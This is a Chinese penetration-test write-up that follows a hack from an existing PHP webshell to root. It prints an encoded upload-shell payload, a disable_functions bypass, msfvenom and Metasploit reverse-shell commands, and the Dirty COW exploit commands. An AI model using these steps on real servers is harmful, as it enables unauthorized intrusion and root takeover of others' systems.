一.前言

在一次綜合滲透的過(guò)程中遇到的比較完整的一個(gè)滲透流程。很多現(xiàn)查的技巧，這次滲透的基礎(chǔ)是基于隊(duì)友已經(jīng)在服務(wù)器寫入了一句話木馬但無(wú)法執(zhí)行系統(tǒng)命令。 二.滲透過(guò)程 一開(kāi)始，我想到的是傳個(gè)大馬上去，為了方便，先寫入了一個(gè)上傳馬：

?a=fputs(fopen(base64_decode(c2hlbGwucGhw),w),base64_decode(base64_decode(UEQ5d2FIQWdEUXBBSkhSbGJYQWdQU0FrWDBaSlRFVlRXeWQxY0d4dllXUmZabWxzWlNkZFd5ZDBiWEJmYm1GdFpTZGRPdzBLUUNSbWFXeGxJRDBnWW1GelpXNWhiV1VvSkY5R1NVeEZVMXNuZFhCc2IyRmtYMlpwYkdVblhWc25ibUZ0WlNkZEtUc05DbWxtSUNobGJYQjBlU0FvSkdacGJHVXBLWHNOQ21WamFHOGdJanhtYjNKdElHRmpkR2x2YmlBOUlDY25JRzFsZEdodlpDQTlJQ2RRVDFOVUp5QkZUa05VV1ZCRlBTZHRkV3gwYVhCaGNuUXZabTl5YlMxa1lYUmhKejVjYmlJN1pXTm9ieUFpVEc5allXd2dabWxzWlRvZ1BHbHVjSFYwSUhSNWNHVWdQU0FuWm1sc1pTY2dibUZ0WlNBOUlDZDFjR3h2WVdSZlptbHNaU2MrWEc0aU8yVmphRzhnSWp4cGJuQjFkQ0IwZVhCbElEMGdKM04xWW0xcGRDY2dkbUZzZFdVZ1BTQW5WWEJzYjJGa0p6NWNiaUk3WldOb2J5QWlQQzltYjNKdFBseHVQSEJ5WlQ1Y2JseHVQQzl3Y21VK0lqdDlaV3h6WlNCN2FXWW9iVzkyWlY5MWNHeHZZV1JsWkY5bWFXeGxLQ1IwWlcxd0xDUm1hV3hsS1NsN1pXTm9ieUFpUm1sc1pTQjFjR3h2WVdSbFpDQnpkV05qWlhOelpuVnNiSGt1UEhBK1hHNGlPMzFsYkhObElIdGxZMmh2SUNKVmJtRmliR1VnZEc4Z2RYQnNiMkZrSUNJZ0xpQWtabWxzWlNBdUlDSXVQSEErWEc0aU8zMTlQejQ9)));

利用這個(gè)上傳馬（shell.php）上傳了一個(gè)比較常用的大馬（297.php）。發(fā)現(xiàn)無(wú)法執(zhí)行系統(tǒng)命令（無(wú)回顯）：

查看phpinfo（）發(fā)現(xiàn)應(yīng)該是disable_function()的原因。隨即使用github上大佬LD_PRELOAD的bypass馬：

https://github.com/zhinaonet/bypass_disablefunc_via_LD_PRELOAD 成功執(zhí)行命令：

可以執(zhí)行命令后便想著提權(quán)，直接上虛擬機(jī)里的kali先用ngrok把虛擬機(jī)里的內(nèi)網(wǎng)穿透出去：

啟動(dòng)msf：

msfconsole msfvenom -l payloads msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=ip LPORT=10017 -f elf > shell.elf 生成反彈shell：

use exploit/multi/handler set PAYLOAD linux/x64/meterpreter_reverse_tcp set LHOST 192.168.1.170 set LPORT 4444 run 開(kāi)啟監(jiān)聽(tīng)，同時(shí)把生成的elf文件用上傳馬上傳到服務(wù)器，用bypass馬chmod賦予權(quán)限后執(zhí)行。 即可反彈成功：

拿到反彈shell后就想著提權(quán)，一看內(nèi)核版本是在臟牛的覆蓋范圍，就嘗試臟牛一把梭。 先去github上下載臟牛的exp源碼：

https://github.com/FireFart/dirtycow 上傳上去之后執(zhí)行命令：

gcc -pthread dirty.c -o dirty -lcrypt ./dirty 執(zhí)行成功！ 但在su切換用戶的時(shí)候出現(xiàn)了幺蛾子：

Standard in must be a tty這種情況我還是頭一次遇見(jiàn)。通過(guò)查詢，發(fā)現(xiàn)可以用python繞過(guò)它：

python -c 'import pty; pty.spawn("/bin/sh")' su firefart

輸入密碼，即可提權(quán)成功：

于此已經(jīng)拿到了root權(quán)限。后滲透階段由于本人不太熟悉就暫且不提了。

三.總結(jié) 這次滲透沒(méi)有什么特別難的難點(diǎn)，主要是隊(duì)友把一句話傳上去打了個(gè)好的基礎(chǔ)。作為腳本小子的我也不過(guò)是用網(wǎng)上大佬們的工具完成了此次滲透。學(xué)藝不精還需要繼續(xù)和菊苣們學(xué)習(xí)。

責(zé)任編輯：彭菁